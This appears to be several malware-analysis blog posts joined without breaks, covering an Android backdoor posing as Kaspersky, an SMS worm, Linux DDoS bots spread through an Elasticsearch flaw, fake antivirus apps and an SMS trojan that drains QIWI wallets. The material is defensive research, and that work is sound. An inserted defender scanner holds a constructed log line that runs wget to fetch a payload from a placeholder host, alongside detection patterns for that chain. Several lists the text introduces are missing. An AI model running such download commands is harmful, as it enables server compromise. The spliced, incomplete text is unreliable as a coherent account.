This week, our virus lab handled a case where a customer received a phishing email carrying an Android backdoor archive masquerading as a Kaspersky mobile security app (we are aware that the app's creators also disguise it as apps from other major AV brands).
The email prompts recipients to install the fake Kaspersky Android app to protect their mobile security. From the context we can presume the intended targets are users in Poland.
Most email phishing attacks tend to target PC users, but this time the attackers have turned their attention to mobile platforms. We think this marks a new trend in malware distribution. Mobile security is closely tied to user privacy: for many users a mobile device matters more than a PC, since it holds their contacts, text messages, photos and call logs. At the same time, mobile security is generally considered a weak point. So most people will believe these phishing emails and are likely to install the fake mobile security app.
In this case, the Android APK in the phishing email is a powerful and aggressive backdoor, detected as Backdoor.AndroidOS.Zerat.a. The backdoor is full of malicious functions, but its GUI is simple and crude.
Maybe it only wants you to install it and click the button. On execution, it connects to hxxp://winrar.nstrefa.pl/path/DeviceManager.php to register the victim's device information.
It then polls hxxp://winrar.nstrefa.pl/path/Linker.php for commands.
Depending on the commands it receives, it performs a wide range of malicious activities. Some of the commands are shown below.
Intercepting text messages:
Store and upload:
This is a new type of mobile security threat that works just like a phishing site or phishing SMS. With the phishing email, the backdoor will spread more easily. There is reason to believe that increasingly complex mobile attacks will follow. Composite attacks on mobile platforms are simply a matter of time.
In this day and age it is very important to protect our privacy and device security. It's recommended to follow these tips:
On August 2, the Chinese Valentine's Day, an Android SMS worm called XXshenqi.apk struck China. In the space of six hours it infected about 500,000 devices, and it has received widespread coverage in the local media. It is not just an SMS worm: it contains two malicious modules, XXshenqi.apk itself and its asset Trogoogle.apk.
The function of XXshenqi.apk is to send SMS to spread itself and to drop another backdoor on the victim device. It is detected as Trojan.AndroidOS.Xshqi.a by Kaspersky Lab.
After installation, it sends an SMS to every contact in the victim's address book to get them to install the Trojan as well.
It then checks whether com.android.Trogoogle.apk is present on the device. If not, it displays a dialog window prompting the user to install Trogoogle.apk.
Trogoogle.apk is a resource file in the assets folder of XXshenqi.apk.
After that, it asks the user to register the app. The Trojan will steal the user's personal ID and name and send them to those controlling the malware.
Trogoogle.apk contains more malicious functions. It is a backdoor and detected as Backdoor.AndroidOS.Trogle.a by Kaspersky Lab. It hides its icon after installation so the user is unaware of its presence. It will then respond to commands to perform malicious activity. The commands include:
It also monitors the victim's text messages and sends them to the malware owner by email or SMS.
The fact that this Trojan combination appeared on the Chinese Valentine's Day is premeditated, taking advantage of user credulity on this special day. It also uses social engineering techniques to spread as widely as possible and infect more devices. This Trojan is a good example of why it's always worth thinking twice about trusting a link received on your mobile phone. No matter who sends it, it could still be a malicious program.
A couple of weeks ago, my colleague Mikhail K posted on the "versatile Linux DDoS trojan", with analysis of several bots, including one implementing some extraordinary DNS amplification DDoS functionality. The operators of these bots are currently active, and we observe new variants of the trojan building bigger botnets.
Let's explore some additional offensive details of this crew's activity, and the overall situation, over the past week. In general, the DDoS trojans are being aimed at victims whose profiles point to purely financially motivated cybercrime. The compromised hosts we observed running the bots were Amazon EC2 instances, but of course this platform is not the only one being attacked and misused. It's also interesting that the operators of this botnet apparently have no problem working with CN sites, as demonstrated by their use of the site hosting their tools since late 2013. Seven of their eight tools hosted there were uploaded in the past couple of weeks, coinciding with their updated attack activity. Their repository includes recent (CVE-2014-0196) and older (CVE-2012-0056) Linux privilege escalation exploit source code, likely compiled on the compromised hosts only when higher privileges are necessary, along with compiled offensive SQL tools (Backdoor.Linux.Ganiw.a), multiple webshells (Backdoor.Perl.RShell.c and Backdoor.Java.JSP.k) and two new variants of the "versatile bots" (Backdoor.Linux.Mayday.g), the UDP-only "xudp" code being the newer of the two.
But first, how are they getting into EC2 instances and running their Linux DDoS bots from the cloud? They are actively exploiting a known, recent Elasticsearch vulnerability affecting all 1.1.x versions (CVE-2014-3120), which happens to still be in active commercial deployment at some organizations. If you are still running 1.1.x, upgrade to the latest 1.2 release or to 1.3, which was released a couple of days ago: dynamic scripting is disabled by default there, and other features were added to ease the migration. From a couple of incidents involving Amazon EC2 customers whose instances were compromised by these attackers, we were able to capture the very early stages of the attacks. The attackers repurpose known CVE-2014-3120 proof-of-concept exploit code to deliver a Perl webshell that Kaspersky products detect as Backdoor.Perl.RShell.c. Linux admins can scan for these malicious components with our server product.
Gaining this foothold presents the attacker with bash shell access on the server. The script pack.pl is fetched with wget from the web host above, saved to /tmp/zerl and run from there, giving the attacker bash shell access. Events in your index logs may suggest your server has fallen to this attack:
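Two defender checks built from the indicators in the last two paragraphs: a scanner that flags Elasticsearch 1.x search log lines whose dynamic script spawns a process or reaches for pack.pl and /tmp/zerl, and a check of whether dynamic scripting is still enabled given the version defaults the post describes. This is an added example, not code from the original post; the log format, every log line and the evil.example host are constructed, and the version logic assumes the `script.disable_dynamic` setting of Elasticsearch 1.x.

```python
"""Defender-side checks for the CVE-2014-3120 chain described above.
Example code added to this page (not from the original post). The log
format and all log lines are constructed; evil.example is a placeholder."""
import re

# Indicators taken from the post: a dynamic script in a search request that
# spawns a process, fetches pack.pl with wget and stages it under /tmp/zerl.
SCRIPT_KEY = re.compile(r'"script(_fields)?"\s*:')
PROCESS_SPAWN = re.compile(r'Runtime\.getRuntime\(\)\.exec|ProcessBuilder')
STAGING = re.compile(r'\bwget\b|pack\.pl|/tmp/zerl')

# Constructed lines in the shape of an Elasticsearch 1.x search slow log.
CONSTRUCTED_LOG = [
    '[2014-07-24 10:12:33,411][TRACE][index.search.slowlog.query] [node-1] '
    '[logs][0] took[27.1ms], source[{"query":{"match_all":{}}}]',
    '[2014-07-24 10:12:35,002][TRACE][index.search.slowlog.query] [node-1] '
    '[logs][0] took[31.9ms], source[{"script_fields":{"x2":{"script":'
    '"doc[\'price\'].value * 2"}}}]',
    '[2014-07-24 10:12:40,870][TRACE][index.search.slowlog.query] [node-1] '
    '[logs][0] took[912.4ms], source[{"script_fields":{"s":{"script":'
    '"... Runtime.getRuntime().exec(\\"wget http://evil.example/pack.pl '
    '-O /tmp/zerl\\") ..."}}}]',
]


def scan_line(line: str) -> list:
    """Reasons one log line looks like exploitation. A script_fields query by
    itself is legitimate, so it is only reported with a spawn or staging hit."""
    reasons = []
    if SCRIPT_KEY.search(line):
        if PROCESS_SPAWN.search(line):
            reasons.append("dynamic script spawns a process")
        if STAGING.search(line):
            reasons.append("script fetches pack.pl / writes /tmp/zerl")
    return reasons


def scan_log(lines) -> list:
    """Return (1-based line number, reasons) for every suspicious line."""
    return [(n, r) for n, l in enumerate(lines, 1) if (r := scan_line(l))]


def dynamic_scripting_enabled(elasticsearch_yml: str, version: str) -> bool:
    """True when dynamic scripting is on: an explicit script.disable_dynamic
    wins; otherwise 1.1.x defaults to enabled and 1.2+ to disabled."""
    for raw in elasticsearch_yml.splitlines():
        setting = raw.split("#", 1)[0].strip()
        if setting.startswith("script.disable_dynamic"):
            return setting.split(":", 1)[1].strip().lower() != "true"
    major, minor = (int(p) for p in version.split(".")[:2])
    return (major, minor) < (1, 2)
```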
Hosted on the same remote server and fetched via the Perl webshell are the DDoS bots carrying new encrypted C2 strings, detected as Backdoor.Linux.Mayday.g. One of the variants includes the DNS amplification functionality described in Mikhail's previous post, but the one in use on compromised EC2 instances, oddly enough, was flooding sites with UDP traffic only. The flow is strong enough that the DDoS victims were forced to move from their normal hosting IP addresses to those of an anti-DDoS solution. It is also strong enough that Amazon is now notifying its customers, probably because of the potential for an unexpected accumulation of excessive resource charges. The situation is probably similar at other cloud providers. The list of DDoS victims includes a large regional US bank and a large electronics maker and service provider in Japan, indicating the perpetrators are likely your standard financially driven cybercrime ilk.
Experts recently discovered a scam antivirus app on Google Play going by the name of Virus Shield. A distinct feature of this particular app was the fact that users had to pay for it - most fake AV can initially be downloaded for free. This meant its creators immediately started making money and didn't have to demand payments from users to remove "malware" that had supposedly been detected on their computers. To avoid negative reviews on Google Play all that was required was to make it look like the app was doing something useful.
Virus Shield was followed by a series of other similar fake apps. Early last week, for instance, we detected two rather interesting fake antivirus programs.
The first fake app was discovered on Windows Phone Store, which in itself was unusual - scammers tend to use Google Play. This app, which also had to be paid for up front, went by the name of Kaspersky Mobile. The fact that there is no program with that name in Kaspersky Lab's product line didn't deter the fraudsters - they obviously didn't expect anyone to notice.
This fake app pretends to carry out some useful activity such as "scanning" files. But look closely at the screenshot and you will see that as well as showing "scan progress" it is supposedly performing a "heuristic analysis". As a rule, antivirus solutions don't display a separate progress bar for a heuristic analysis.
However, the scammers seem to know a bit more about software vendors, and their name-dropping wasn't limited to Kaspersky Lab. The fake AV creators uploaded numerous other paid apps to Windows Phone Store that used the names and logos of several popular programs.
They include Google Chrome for 99 rubles (approx. $2.80), and Google Chrome Pro, which for some reason cost just 59 rubles. There are some "antivirus" applications from unknown developers, but upon closer inspection the only difference between them and Kaspersky Mobile turned out to be the logo and the colors used in the interface.
But most interesting of all was Virus Shield at 69 rubles (approx. $2) - the same fake AV we mentioned above - which was discovered on Google Play.
This is a good example of how one successful scam spawns numerous clones. Instead of just one fake AV, the scammers offer dozens of fake apps, copying the design, but not the functionality of the original.
The second fake app of note that we discovered was for sale on Google Play and was called Kaspersky Anti-Virus 2014. Just to clarify, there is no Kaspersky Lab mobile product by that name. The screenshot used on the page of the fake app was simply copied from the official Kaspersky Internet Security for Android page.
The fake app does absolutely nothing to protect the user's device - the creators didn't even bother to add a simulation of a scanner. Instead of a security solution the buyer gets nothing more than a fake app whose functionality is limited to random statements along the lines of a Magic 8-Ball set against a background of the Kaspersky Anti-Virus logo. Kaspersky Lab products detect the app as Trojan-FakeAV.AndroidOS.Wkas.a.
It is quite possible that more and more of these fake apps will start appearing. One thing is for sure - the mechanisms put in place by the official stores are clearly unable to combat scams like this.
P.S. Either there weren't too many takers for the fake Kaspersky Internet Security for Android, or greed got the better of the creators - in any case, they decided to up the ante. Apart from an "antivirus" app for 142 rubles, we discovered another app on the scammers' Google Play page that was on sale for 3556 rubles (approx. $100).
The screenshots for this expensive program bearing the name 'i am rich' were reminiscent of those used in an app for iOS with the same name whose functionality consisted entirely of displaying an image of a ruby and a caption saying "I am rich". We decided not to pay the $100 asking price for the app, but we're sure that its functionality is not much different from its earlier namesake or any of the other fake apps from the scammers in question.
We've written several times about mobile malware that can send text messages to premium numbers or steal money from online bank accounts. We also know that cybercriminals are constantly looking for new ways of stealing money using mobile Trojans. So our recent discovery of Trojan-SMS.AndroidOS.Waller.a highlighted a new get-rich technique that not only sent a premium SMS but also saw the malware attempt to steal money from a QIWI electronic wallet.
After Trojan-SMS.AndroidOS.Waller.a launches, it contacts its C&C server and awaits further commands.
The cybercriminals' C&C server is located at playerhome.info. The domain is registered by a French company and the registration data gives a French telephone number, but the email is an account with the Russian company Yandex. The Cloudflare cloud service is used to host the domain.
After receiving the relevant commands, Trojan-SMS.AndroidOS.Waller.a can:
However, as well as the standard Trojan-SMS functions, Waller possesses several other features that let it steal from the QIWI Wallets of infected smartphone owners. After receiving the relevant command, the Trojan checks the balance of the QIWI electronic wallet by sending an SMS request to the number 7494. The reply is intercepted by the Trojan and forwarded to its owners.
If the owner of an infected smartphone has a QIWI account and Waller receives information that there is money in the e-wallet, then the Trojan can transfer the money from the user's account to the QIWI account of the cybercriminals. To do this a command is given to the Trojan to send an SMS to the number 7494 that includes the wallet number of the criminals and the sum to be transferred. Up to 15,000 rubles (approximately $430) can be transferred per day.
Below is a sample answer from a C&C server with commands to check the balance of a phone account, the balance of a QIWI Wallet and to delete incoming text messages from the premium numbers 1141, 1151, 1899, and 1161:
Using electronic wallets makes it possible for cybercriminals to steal money from people in countries where premium-rate numbers don't work. Electronic wallets that can be managed via SMS are available in lots of countries. According to Wikipedia, the QIWI service is on the market in seven other countries apart from Russia (Romania, Brazil, Kazakhstan, Belarus, Moldova, Jordan and the USA) and there are franchises in 15 other countries.
The Trojan spreads from cybercriminal sites in the guise of applications such as "universal android firmware", "media player classic for android" and "change your voice on android". Waller also spreads via SMS spam. The Trojan is still not very widespread, but cybercriminals are increasingly using it to try to infect mobile devices.
To reduce the risk of infection by mobile malware we recommend that users: